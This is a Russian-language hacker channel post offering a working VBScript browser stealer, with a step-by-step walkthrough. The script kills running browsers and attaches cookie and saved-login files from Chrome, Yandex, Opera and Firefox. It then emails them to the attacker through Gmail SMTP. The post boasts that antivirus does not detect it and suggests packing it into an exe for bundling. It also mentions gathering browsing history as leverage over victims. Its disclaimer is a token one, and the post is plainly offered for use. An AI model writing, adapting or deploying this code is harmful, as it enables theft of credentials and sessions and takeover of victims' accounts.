Стиллер паролей из браузеров на vbs (FUD 0/59)

Стиллер паролей из браузеров на vbs (FUD 0/59)

Anonymous Legion


Что бы бесплатно сделать объявление о работе и товарах и стать нашим проверенным ТСом (продажа ваших товаров. объявление о наборе воркеров) пишите в @mind_xakep

Дисклеймер:

Данная статья не призывает к действиям и представлена лишь для ознакомления.

Почему же vbs, а не любое существующее решение? Да потому что он даже без криптования не палится ничем (0/59 virus total), и запустится на любой windows системе.

Данная программа достанет нам Cookies из Google Chrome, Yandex Browser, Opera и Firefox, а так же пароли из Хрома и Яндекса (система легко апдейтится для любых хром-подобных браузеров. Так же мы можем достать файл истории из браузеров, что может нам помочь в получении компромата или изучении поведения жертвы. Ну и всё добытое отправит нам на почту. Если есть нужда можете написать в лс @GalaxyDragon, отправлю версию которая будет копировать файлы в текущую папку (для запуска с флешки).

P.S. да, я покривил душой говоря что крадутся пароли. Из файла Login Data действительно достаются пароли программой chromepass. Куки тоже могут дать вам доступ к сайту от лица жертвы.

Для использования вам нужна какая-нибудь почта gmail. Для склейки можете перевести его в exe с помощью этой проги.

Внимание: после первого запуска (закройте все браузеры) программа вылетит, а в почте на которую вы присылаете появится письмо с предложением разрешить использование почты из небезопасных приложений. Подтвердите его.

Попробуем объяснить некоторые места:


Просто объявление глобальный переменных. идём дальше.

Const schema  = "http://schemas.microsoft.com/cdo/configuration/"

Const cdoBasic = 1

Const cdoSendUsingPort = 2

Dim oMsg, oConf

 Set wshShell = CreateObject( "WScript.Shell" )

strUserName = wshShell.ExpandEnvironmentStrings( "%USERNAME%" )

On Error Resume Next



Set oMsg   = CreateObject("CDO.Message")

oMsg.From   = "yourgmail@gmail.com" ' имя вашего ящика

oMsg.To    = "yourgmail@gmail.com"  'кому. пишите вас же

oMsg.Subject = "Test from VBScript"

oMsg.TextBody = "If you can read this, the script worked!" 


Set WshShell = CreateObject("WScript.Shell")


Set oExec = WshShell.Exec("taskkill /fi ""imagename eq opera.exe""")'завершение оперы, иначе нет доступа к крадущимся фалам.

Set oExec = WshShell.Exec("taskkill /fi ""imagename eq firefox.exe""")'огнелиса

Set oExec = WshShell.Exec("taskkill /fi ""imagename eq chrome.exe""")'хрома

Set oExec = WshShell.Exec("taskkill /fi ""imagename eq browser.exe""")' яндекс браузера


WScript.Sleep 4000' пауза чтобы браузеры успели закрыться и был доступ. нельзя чтобы юзер снова открыл браузер


Set FSO = CreateObject("Scripting.FileSystemObject")

If (FSO.FileExists("C:\Users\" & strUserName & "\AppData\Local\Google\Chrome\User Data\Default\Cookies")) Then

oMsg.AddAttachment "C:\Users\" & strUserName & "\AppData\Local\Google\Chrome\User Data\Default\Cookies"

oMsg.AddAttachment "C:\Users\" & strUserName & "\AppData\Local\Google\Chrome\User Data\Default\Login Data"

Else

End if

Проверям существование браузера на данном пк, и если есть то отправляем к себе куки.

If (FSO.FileExists("C:\Users\" & strUserName & "\AppData\Roaming\Opera Software\Opera Stable\Cookies")) Then

oMsg.AddAttachment "C:\Users\" & strUserName & "\AppData\Roaming\Opera Software\Opera Stable\Cookies"

Else

End if

If (FSO.FileExists("C:\Users\" & strUserName & "\AppData\Roaming\Mozilla\Firefox\Profiles\qx1fqa6b.Default User\cookies.sqlite")) Then

oMsg.AddAttachment "C:\Users\" & strUserName & "\AppData\Roaming\Mozilla\Firefox\Profiles\qx1fqa6b.Default User\cookies.sqlite"

Else

End if

If (FSO.FileExists("C:\Users\" & strUserName & "\AppData\Local\Yandex\YandexBrowser\User Data\Default\Cookies")) Then

oMsg.AddAttachment "C:\Users\" & strUserName & "\AppData\Local\Yandex\YandexBrowser\User Data\Default\Cookies"

oMsg.AddAttachment "C:\Users\" & strUserName & "\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data"

Else

End if




' GMail SMTP server configuration and authentication info

Set oConf = oMsg.Configuration

oConf.Fields(schema & "smtpserver")    = "smtp.gmail.com" '

oConf.Fields(schema & "smtpserverport")  = 465       'port number

oConf.Fields(schema & "sendusing")    = cdoSendUsingPort

oConf.Fields(schema & "smtpauthenticate") = cdoBasic     'authentication type

oConf.Fields(schema & "smtpusessl")    = True       'use SSL encryption

oConf.Fields(schema & "sendusername")   = "yourgmail@gmail.com" 'ящик для отсылки

oConf.Fields(schema & "sendpassword")   = "password"   'пороль от этого ящика

oConf.Fields.Update()

 

' send message

oMsg.Send()

 



If Err Then

  resultMessage = "ERROR " & Err.Number & ": " & Err.Description

  Err.Clear()

Else

  resultMessage = "Message sent ok"' 'Удалить после дебага

End If

 

Wscript.echo(resultMessage)' Удалить после дебага


то что придёт выглядит как то так

Вообщем-то всё. Надеюсь было полезно, и вы заинтересуетесь vbs.




Anonymous Legion